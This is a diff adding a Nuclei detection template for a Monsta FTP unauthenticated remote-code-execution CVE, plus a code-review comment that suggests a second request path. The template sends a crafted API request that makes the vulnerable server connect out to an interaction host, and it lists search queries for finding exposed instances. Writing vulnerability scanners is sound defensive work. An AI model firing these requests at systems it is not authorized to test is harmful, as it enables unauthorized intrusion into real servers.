|
| 1 | +id: CVE-2025-34299 |
| 2 | + |
| 3 | +info: |
| 4 | + name: Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution |
| 5 | + author: KrE80r |
| 6 | + severity: critical |
| 7 | + description: | |
| 8 | + Monsta FTP = 2.11 contains an unrestricted file upload vulnerability caused by lack of authentication on file uploads, letting unauthenticated attackers execute arbitrary code by uploading crafted files. |
| 9 | + impact: | |
| 10 | + Unauthenticated attackers can upload malicious files to execute arbitrary code, potentially compromising the server. |
| 11 | + remediation: | |
| 12 | + Update to the latest version beyond 2.11. |
| 13 | + reference: |
| 14 | + - https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/ |
| 15 | + - https://github.com/advisories/GHSA-42m5-3r2p-wr92 |
| 16 | + - https://nvd.nist.gov/vuln/detail/CVE-2025-34299 |
| 17 | + classification: |
| 18 | + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 19 | + cvss-score: 9.8 |
| 20 | + cve-id: CVE-2025-34299 |
| 21 | + cwe-id: CWE-434 |
| 22 | + metadata: |
| 23 | + verified: true |
| 24 | + max-request: 2 |
| 25 | + vendor: monstaftp |
| 26 | + product: monsta_ftp |
| 27 | + shodan-query: http.title:"Monsta FTP" |
| 28 | + fofa-query: title="Monsta FTP" |
| 29 | + tags: cve,cve2025,monsta,ftp,rce,unauth,file-upload,intrusive,oast,oob,kev,vkev |
| 30 | + |
| 31 | +flow: http(1) && http(2) |
| 32 | + |
| 33 | +http: |
| 34 | + - method: GET |
| 35 | + path: |
| 36 | + - "{{BaseURL}}/mftp/" |
| 37 | + - "{{BaseURL}}/" |
| 38 | + |
| 39 | + stop-at-first-match: true |
| 40 | + |
| 41 | + host-redirects: true |
| 42 | + max-redirects: 2 |
| 43 | + |
| 44 | + matchers: |
| 45 | + - type: dsl |
| 46 | + dsl: |
| 47 | + - 'status_code == 200' |
| 48 | + - 'contains(body, "MonstaFTP")' |
| 49 | + condition: and |
| 50 | + internal: true |
| 51 | + |
| 52 | + extractors: |
| 53 | + - type: regex |
| 54 | + name: version |
| 55 | + group: 1 |
| 56 | + regex: |
| 57 | + - 'monsta-min-([0-9.]+)\.js' |
| 58 | + internal: true |
| 59 | + |
| 60 | + - raw: |
| 61 | + - | |
| 62 | + POST {{BaseURL}}/mftp/application/api/api.php HTTP/1.1 |
| 63 | + Host: {{Hostname}} |
| 64 | + Content-Type: application/x-www-form-urlencoded |
| 65 | +
|
| 66 | + request={"connectionType":"ftp","configuration":{"host":"{{interactsh-url}}","username":"nuclei-oast","initialDirectory":"/","password":"test","port":21},"actionName":"downloadFile","context":{"remotePath":"/test.txt","localPath":"/tmp/nuclei-oast-test.txt"}} |
| 67 | +
|
| 68 | + matchers-condition: and |
| 69 | + matchers: |
| 70 | + - type: word |
| 71 | + part: interactsh_protocol |
| 72 | + words: |
| 73 | + - "dns" |
| 74 | + |
| 75 | + - type: dsl |
| 76 | + dsl: |
| 77 | + - 'compare_versions(version, "<= 2.11.2")' |
| 78 | + |
| 79 | + extractors: |
| 80 | + - type: kval |
| 81 | + kval: |
| 82 | + - version |
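Review bot: The POST at gutter line 62 hard-codes `{{BaseURL}}/mftp/application/api/api.php`, yet the fingerprint request at lines 36-37 also accepts a match on `{{BaseURL}}/`, so a Monsta FTP install served from the web root passes http(1) and then has its API request sent to a path that does not exist there, producing a silent miss. Since `raw:` is a list, the cheapest fix is a second raw POST aimed at `{{BaseURL}}/application/api/api.php` (bumping `max-request: 3`), as sketched below. Separately, joining the DNS interaction with `compare_versions(version, "<= 2.11.2")` under `matchers-condition: and` means a host that resolves the OAST domain but exposes no `monsta-min-<ver>.js` filename is reported clean — as far as I can tell an unset `version` makes that DSL matcher fail rather than match — so consider gating on the OAST callback alone and leaving the version as an extractor. The description text `Monsta FTP = 2.11` also disagrees with the title's `<= 2.11.2` and looks like a lost `<=`.
```yaml
  - raw:
      # … unchanged: first POST to {{BaseURL}}/mftp/application/api/api.php …
      - |
        POST {{BaseURL}}/application/api/api.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        request={"connectionType":"ftp","configuration":{"host":"{{interactsh-url}}","username":"nuclei-oast","initialDirectory":"/","password":"test","port":21},"actionName":"downloadFile","context":{"remotePath":"/test.txt","localPath":"/tmp/nuclei-oast-test.txt"}}

    # … unchanged: matchers-condition, matchers, extractors …
```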